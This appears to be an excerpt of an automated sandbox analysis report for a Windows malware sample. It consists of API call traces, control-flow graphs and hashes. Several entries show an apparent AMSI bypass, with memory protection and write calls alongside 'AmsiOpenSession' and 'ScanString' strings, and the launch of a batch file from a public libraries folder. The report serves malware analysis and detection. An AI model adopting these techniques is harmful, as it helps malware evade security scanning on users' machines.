                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3557136124-0
                                                                                                    • Opcode ID: b78340263f8f8e24abdb821595fa2ae1e4ee3e4ee515104cc9ec8eeb50b2f330
                                                                                                    • Instruction ID: 0deca2fa700d4f46d0863c9fbd691a9000323258d09b96e5366f91f45796ccf9
                                                                                                    • Opcode Fuzzy Hash: b78340263f8f8e24abdb821595fa2ae1e4ee3e4ee515104cc9ec8eeb50b2f330
                                                                                                    • Instruction Fuzzy Hash: E5F06D76319240AFE311FF26EDD182977EAEB8AB053814430E4118B7A5DBBCFC918A54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,04147598), ref: 04147441
                                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 04147474
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0414748F
                                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 041474C5
                                                                                                    • RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,04147598), ref: 041474DB
                                                                                                      • Part of subcall function 04117B44: InitializeCriticalSection.KERNEL32(List,?,?,041474F1,00000000,00000000,?,?,00000000,04147598), ref: 04117B63
                                                                                                      • Part of subcall function 04147028: SetErrorMode.KERNEL32(00008000), ref: 04147041
                                                                                                      • Part of subcall function 04147028: GetModuleHandleA.KERNEL32(USER32,00000000,0414718E,?,00008000), ref: 04147065
                                                                                                      • Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 04147072
                                                                                                      • Part of subcall function 04147028: LoadLibraryA.KERNEL32(imm32.dll,00000000,0414718E,?,00008000), ref: 0414708E
                                                                                                      • Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 041470B0
                                                                                                      • Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 041470C5
                                                                                                      • Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 041470DA
                                                                                                      • Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 041470EF
                                                                                                      • Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 04147104
                                                                                                      • Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 04147119
                                                                                                      • Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0414712E
                                                                                                      • Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 04147143
                                                                                                      • Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 04147158
                                                                                                      • Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 0414716D
                                                                                                      • Part of subcall function 04147028: SetErrorMode.KERNEL32(?,04147195,00008000), ref: 04147188
                                                                                                      • Part of subcall function 04151538: GetKeyboardLayout.USER32(00000000), ref: 0415157D
                                                                                                      • Part of subcall function 04151538: GetDC.USER32(00000000), ref: 041515D2
                                                                                                      • Part of subcall function 04151538: GetDeviceCaps.GDI32(00000000,0000005A), ref: 041515DC
                                                                                                      • Part of subcall function 04151538: ReleaseDC.USER32(00000000,00000000), ref: 041515E7
                                                                                                      • Part of subcall function 04152740: LoadIconA.USER32(00000000,MAINICON), ref: 04152837
                                                                                                      • Part of subcall function 04152740: GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,04147530,00000000,00000000,?,?,00000000,04147598), ref: 04152869
                                                                                                      • Part of subcall function 04152740: OemToCharA.USER32(?,?), ref: 0415287C
                                                                                                      • Part of subcall function 04152740: CharNextA.USER32(?,00000000,?,00000100,?,?,?,04147530,00000000,00000000,?,?,00000000,04147598), ref: 041528BB
                                                                                                      • Part of subcall function 04152740: CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,04147530,00000000,00000000,?,?,00000000,04147598), ref: 041528C1
                                                                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,04147598), ref: 0414755F
                                                                                                    • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 04147570
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow
                                                                                                    • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                                                    • API String ID: 1515865724-1126952177
                                                                                                    • Opcode ID: cdce5071681897280cb3ba5366be70415ada1eac1762ca9322d3397a2fb6b9b8
                                                                                                    • Instruction ID: e7dacbdc641b67b0c0d5f959da387a12537216a70b77fd111f0a040773fbd2d4
                                                                                                    • Opcode Fuzzy Hash: cdce5071681897280cb3ba5366be70415ada1eac1762ca9322d3397a2fb6b9b8
                                                                                                    • Instruction Fuzzy Hash: 97415BB4A102459FEB00FFB9E9C0A9E77F9EB49308B008524E515EB390DB79BD458F64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5020 415bcf8-415bcfc 5021 415bd01-415bd06 5020->5021 5021->5021 5022 415bd08-415c1b2 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 41049ec * 2 call 4104b0c call 4104a24 call 410320c call 4104980 * 2 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 41049ec call 4108eb0 call 4104c4c call 410507c call 41050f8 call 41049ec call 4104c4c call 410507c call 41050f8 CreateProcessAsUserW call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 5021->5022 5182 415c1b7-415c1bb 5022->5182 5183 415c2c6-415c313 call 41047ac call 4104f68 call 41047ac call 4104f68 call 41047ac 5182->5183 5184 415c1c1-415c2c1 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 call 4104b0c call 4104c4c call 4104980 call 4104a98 call 4104c4c call 4104980 call 411fd38 WaitForSingleObject CloseHandle * 2 5182->5184 5184->5183
                                                                                                    APIs
                                                                                                      • Part of subcall function 0411FD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD70
                                                                                                      • Part of subcall function 0411FD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD7E
                                                                                                      • Part of subcall function 0411FD38: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 0411FD97
                                                                                                      • Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB3
                                                                                                      • Part of subcall function 0411FD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB9
                                                                                                      • Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE3
                                                                                                      • Part of subcall function 0411FD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE9
                                                                                                      • Part of subcall function 0411FD38: FreeLibrary.KERNEL32(74AD0000,00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000), ref: 0411FDF4
                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,0428EBB8,0428EBFC,ScanString,0419A350,0415C330,OpenSession,0419A350), ref: 0415C05F
                                                                                                    • WaitForSingleObject.KERNEL32(000008B0,000000FF,ScanString,0419A350,0415C330,OpenSession,0419A350,0415C330,ScanString,0419A350,0415C330,OpenSession,0419A350,0415C330,UacScan,0419A350), ref: 0415C2AB
                                                                                                    • CloseHandle.KERNEL32(000008B0,000008B0,000000FF,ScanString,0419A350,0415C330,OpenSession,0419A350,0415C330,ScanString,0419A350,0415C330,OpenSession,0419A350,0415C330,UacScan), ref: 0415C2B6
                                                                                                    • CloseHandle.KERNEL32(000008AC,000008B0,000008B0,000000FF,ScanString,0419A350,0415C330,OpenSession,0419A350,0415C330,ScanString,0419A350,0415C330,OpenSession,0419A350,0415C330), ref: 0415C2C1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleProcess$CloseCurrentLibraryMemoryVirtual$AddressCreateFreeLoadModuleObjectProcProtectSingleUserWaitWrite
                                                                                                    • String ID: *"C:\Users\Public\Libraries\AkaelkovO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                    • API String ID: 2776809114-3788145045
                                                                                                    • Opcode ID: e7b6a40ed5a7f9e40cbd62d7777850a44f92ff17b98af2c7dcc28c39e46d72a6
                                                                                                    • Instruction ID: 63fbccb325d945906bdc27eee54116c3773910837cf3c959c5beb6e03c14a66b
                                                                                                    • Opcode Fuzzy Hash: e7b6a40ed5a7f9e40cbd62d7777850a44f92ff17b98af2c7dcc28c39e46d72a6
                                                                                                    • Instruction Fuzzy Hash: 5BF1FD35A0121DDBEB10FBA4D9C1BDEB3B9EF84204F1181A5E504AB2A4DBB0BD45CF95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 7130 4152740-415274d 7131 4152757-415276f call 411d8bc 7130->7131 7132 415274f-4152752 call 4103bdc 7130->7132 7136 4152771-4152779 7131->7136 7137 415277f-4152789 7131->7137 7132->7131 7136->7137 7138 4152799-4152890 call 41038a0 * 3 call 4127150 LoadIconA call 4127524 GetModuleFileNameA OemToCharA call 410ce38 7137->7138 7139 415278b-4152793 7137->7139 7152 41528a0-41528af call 410ce6c 7138->7152 7153 4152892-415289b call 4109024 7138->7153 7139->7138 7157 41528b4-41528e9 CharNextA CharLowerA call 41049f8 call 411ea38 7152->7157 7158 41528b1 7152->7158 7153->7152 7162 41528ee-41528fc 7157->7162 7158->7157 7163 4152905-4152934 call 4154b14 call 4155674 7162->7163 7164 41528fe-4152900 call 4152a94 7162->7164 7170 4152945-415294c 7163->7170 7171 4152936-4152942 call 4103c34 7163->7171 7164->7163 7171->7170
                                                                                                    APIs
                                                                                                    • LoadIconA.USER32(00000000,MAINICON), ref: 04152837
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,04147530,00000000,00000000,?,?,00000000,04147598), ref: 04152869
                                                                                                    • OemToCharA.USER32(?,?), ref: 0415287C
                                                                                                    • CharNextA.USER32(?,00000000,?,00000100,?,?,?,04147530,00000000,00000000,?,?,00000000,04147598), ref: 041528BB
                                                                                                    • CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,04147530,00000000,00000000,?,?,00000000,04147598), ref: 041528C1
                                                                                                      • Part of subcall function 04152A94: GetClassInfoA.USER32(04100000,04152730,?), ref: 04152AF3
                                                                                                      • Part of subcall function 04152A94: RegisterClassA.USER32(0416B650), ref: 04152B0B
                                                                                                      • Part of subcall function 04152A94: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 04152BA7
                                                                                                      • Part of subcall function 04152A94: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 04152BC9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
                                                                                                    • String ID: MAINICON
                                                                                                    • API String ID: 2763768735-2283262055
                                                                                                    • Opcode ID: e5bef8ef5667d7c33d26a51dc25d57aea90a4b9b8acdd4b46644b0787a77effa
                                                                                                    • Instruction ID: fa06f7135b837ff34c0693914c569729aa6941956c53a6e413830b6006df07fd
                                                                                                    • Opcode Fuzzy Hash: e5bef8ef5667d7c33d26a51dc25d57aea90a4b9b8acdd4b46644b0787a77effa
                                                                                                    • Instruction Fuzzy Hash: E2514D70604244DFEB50EF68C8C4BC57BE4AB15308F4481F5DC58CF3A6DBB9A9888B61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 7180 41017c0-41017d2 7181 4101a04-4101a09 7180->7181 7182 41017d8-41017e8 7180->7182 7185 4101b1c-4101b1f 7181->7185 7186 4101a0f-4101a20 7181->7186 7183 4101840-4101849 7182->7183 7184 41017ea-41017f7 7182->7184 7183->7184 7189 410184b-4101857 7183->7189 7192 4101810-410181c 7184->7192 7193 41017f9-4101806 7184->7193 7190 4101720-4101749 VirtualAlloc 7185->7190 7191 4101b25-4101b27 7185->7191 7187 4101a22-4101a3e 7186->7187 7188 41019d4-41019e1 7186->7188 7194 4101a40-4101a48 7187->7194 7195 4101a4c-4101a5b 7187->7195 7188->7187 7199 41019e3-41019f7 Sleep 7188->7199 7189->7184 7198 4101859-4101865 7189->7198 7196 410177b-4101781 7190->7196 7197 410174b-4101778 call 41016e0 7190->7197 7202 410188c-4101895 7192->7202 7203 410181e-410182c 7192->7203 7200 4101830-410183d 7193->7200 7201 4101808-410180c 7193->7201 7204 4101aa8-4101abe 7194->7204 7206 4101a74-4101a7c 7195->7206 7207 4101a5d-4101a71 7195->7207 7197->7196 7198->7184 7208 4101867-410187a Sleep 7198->7208 7199->7187 7211 41019f9-4101a00 Sleep 7199->7211 7209 4101897-41018a4 7202->7209 7210 41018c8-41018d2 7202->7210 7217 4101ac0-4101ace 7204->7217 7218 4101ad7-4101ae3 7204->7218 7214 4101a98-4101a9a call 4101668 7206->7214 7215 4101a7e-4101a96 7206->7215 7207->7204 7208->7184 7213 4101880-4101887 Sleep 7208->7213 7209->7210 7216 41018a6-41018ba Sleep 7209->7216 7219 4101944-4101950 7210->7219 7220 41018d4-41018ff 7210->7220 7211->7188 7213->7183 7223 4101a9f-4101aa7 7214->7223 7215->7223 7216->7210 7225 41018bc-41018c3 Sleep 7216->7225 7217->7218 7226 4101ad0 7217->7226 7229 4101b04 7218->7229 7230 4101ae5-4101af8 7218->7230 7221 4101952-4101964 7219->7221 7222 4101978-4101987 call 4101668 7219->7222 7227 4101901-410190f 7220->7227 7228 4101918-4101926 7220->7228 7232 4101966 7221->7232 7233 4101968-4101976 7221->7233 7239 4101999-41019d2 7222->7239 7245 4101989-4101993 7222->7245 7225->7209 7226->7218 7227->7228 7235 4101911 7227->7235 7236 4101994 7228->7236 7237 4101928-4101942 call 410159c 7228->7237 7231 4101b09-4101b1b 7229->7231 7230->7231 7238 4101afa-4101aff call 410159c 7230->7238 7232->7233 7233->7239 7235->7228 7236->7239 7237->7239 7238->7231
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000,?,0410209C), ref: 0410186C
                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,0410209C), ref: 04101882
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 76f23860b16538861365b08078358ea47bcc19cc3907be54f17334a75c235170
                                                                                                    • Instruction ID: 736a8cffefacc9563b6fb99c1dfb7d152ee160b36f7b09d1ef5b115bbfc705a4
                                                                                                    • Opcode Fuzzy Hash: 76f23860b16538861365b08078358ea47bcc19cc3907be54f17334a75c235170
                                                                                                    • Instruction Fuzzy Hash: B5B11372610210DBD719CF29E8C4365BBE1FB85320F18C2AED4698B3C4DBB9AC81C790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 7249 4101b28-4101b37 7250 4101c08-4101c0b 7249->7250 7251 4101b3d-4101b41 7249->7251 7252 4101c11-4101c1b 7250->7252 7253 4101cf8-4101cfc 7250->7253 7254 4101b43-4101b4a 7251->7254 7255 4101ba4-4101bad 7251->7255 7256 4101bd8-4101be5 7252->7256 7257 4101c1d-4101c29 7252->7257 7260 4101d02-4101d07 7253->7260 7261 4101784-41017a7 call 41016e0 VirtualFree 7253->7261 7258 4101b78-4101b7a 7254->7258 7259 4101b4c-4101b57 7254->7259 7255->7254 7262 4101baf-4101bc3 Sleep 7255->7262 7256->7257 7264 4101be7-4101bfb Sleep 7256->7264 7265 4101c60-4101c6e 7257->7265 7266 4101c2b-4101c2e 7257->7266 7269 4101b7c-4101b8d 7258->7269 7270 4101b8f 7258->7270 7267 4101b60-4101b75 7259->7267 7268 4101b59-4101b5e 7259->7268 7279 41017b2 7261->7279 7280 41017a9-41017b0 7261->7280 7262->7254 7263 4101bc9-4101bd4 Sleep 7262->7263 7263->7255 7264->7257 7272 4101bfd-4101c04 Sleep 7264->7272 7273 4101c32-4101c36 7265->7273 7276 4101c70-4101c75 call 410155c 7265->7276 7266->7273 7269->7270 7274 4101b92-4101b9f 7269->7274 7270->7274 7272->7256 7277 4101c78-4101c85 7273->7277 7278 4101c38-4101c3e 7273->7278 7274->7252 7276->7273 7277->7278 7283 4101c87-4101c8e call 410155c 7277->7283 7285 4101c90-4101c9a 7278->7285 7286 4101c40-4101c5e call 410159c 7278->7286 7284 41017b5-41017bf 7279->7284 7280->7284 7283->7278 7288 4101cc8-4101cf5 call 41015fc 7285->7288 7289 4101c9c-4101cc4 VirtualFree 7285->7289
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,04102080), ref: 04101BB3
                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,04102080), ref: 04101BCD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: a4eb0370e731bd3c9d9bce5d908c67a95f910f52739804d152cbcd79604d3d54
                                                                                                    • Instruction ID: 27d75cae41ca39b522bcb8ac2703a1ef07f0c6b3ad306d93a66867e4b55c445b
                                                                                                    • Opcode Fuzzy Hash: a4eb0370e731bd3c9d9bce5d908c67a95f910f52739804d152cbcd79604d3d54
                                                                                                    • Instruction Fuzzy Hash: 0B51D171610300AFE7198F68DAC4756BBE0EF45324F18C5AEE4448B2C1EBFAE984C791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 7359 412765c-4127696 MulDiv 7360 4127698-412769f call 4127618 7359->7360 7361 41276ae-41276e7 call 4120204 call 41202a4 call 4120308 7359->7361 7360->7361 7366 41276a1-41276a9 call 4104820 7360->7366 7372 4127701-4127716 call 41038d0 7361->7372 7373 41276e9-41276f4 call 4120538 7361->7373 7366->7361 7376 41276f9-41276fc call 4120274 7373->7376 7376->7372
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 04127682
                                                                                                      • Part of subcall function 04127618: GetDC.USER32(00000000), ref: 04127621
                                                                                                      • Part of subcall function 04127618: SelectObject.GDI32(00000000,058A00B4), ref: 04127633
                                                                                                      • Part of subcall function 04127618: GetTextMetricsA.GDI32(00000000), ref: 0412763E
                                                                                                      • Part of subcall function 04127618: ReleaseDC.USER32(00000000,00000000), ref: 0412764F
                                                                                                    Strings
                                                                                                    • Tahoma, xrefs: 041276A4
                                                                                                    • MS Shell Dlg 2, xrefs: 041276EC
                                                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 041276D8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsObjectReleaseSelectText
                                                                                                    • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
                                                                                                    • API String ID: 2013942131-1011973972
                                                                                                    • Opcode ID: 946c90fddc20533e62fe5f3189b524a517498c246fbf4e892b2d500fff3d0221
                                                                                                    • Instruction ID: f0045be429b79616b246e32d9c8d9cca65e41bd66f187741aff73fbe30f05544
                                                                                                    • Opcode Fuzzy Hash: 946c90fddc20533e62fe5f3189b524a517498c246fbf4e892b2d500fff3d0221
                                                                                                    • Instruction Fuzzy Hash: 4A11E330600218AFFB11EFA8DBC195E7BA5EB0A604F5045A0E910E7690CB35FE21CB10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(04100000,0411EA28,?), ref: 0411EA59
                                                                                                    • UnregisterClassA.USER32(0411EA28,04100000), ref: 0411EA82
                                                                                                    • RegisterClassA.USER32(0416AAF8), ref: 0411EA8C
                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0411EAD7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4025006896-0
                                                                                                    • Opcode ID: 5790301f717812e3f0ad71b77c2ee73b24b32715fcb2779cd02a1c5a937cf2a5
                                                                                                    • Instruction ID: 445af86f888c22a9a9019e3a0d80488cfb4aceb20acc92371a6c3a087600c8fe
                                                                                                    • Opcode Fuzzy Hash: 5790301f717812e3f0ad71b77c2ee73b24b32715fcb2779cd02a1c5a937cf2a5
                                                                                                    • Instruction Fuzzy Hash: 8B015BB1640204ABEA00EB99ADC0E9A379DEB09318F108165F919FB2D1DB75FC918B60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,041204A2), ref: 04120374
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,041204A2), ref: 041203DF
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 04120444
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: fcc92235cfe9e59ee81c499a9268907fee4c1f5523acf91d03b5da96cc48d60c
                                                                                                    • Instruction ID: 4d2eced05f47001b522e1bb770e4ce350e912daa47c7f75bb7797bfea92d29b3
                                                                                                    • Opcode Fuzzy Hash: fcc92235cfe9e59ee81c499a9268907fee4c1f5523acf91d03b5da96cc48d60c
                                                                                                    • Instruction Fuzzy Hash: B3418A30B00758AFEB11EBA4CAC1B9EBBF9AF48304F118569E544E3291DBB5BF159740
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
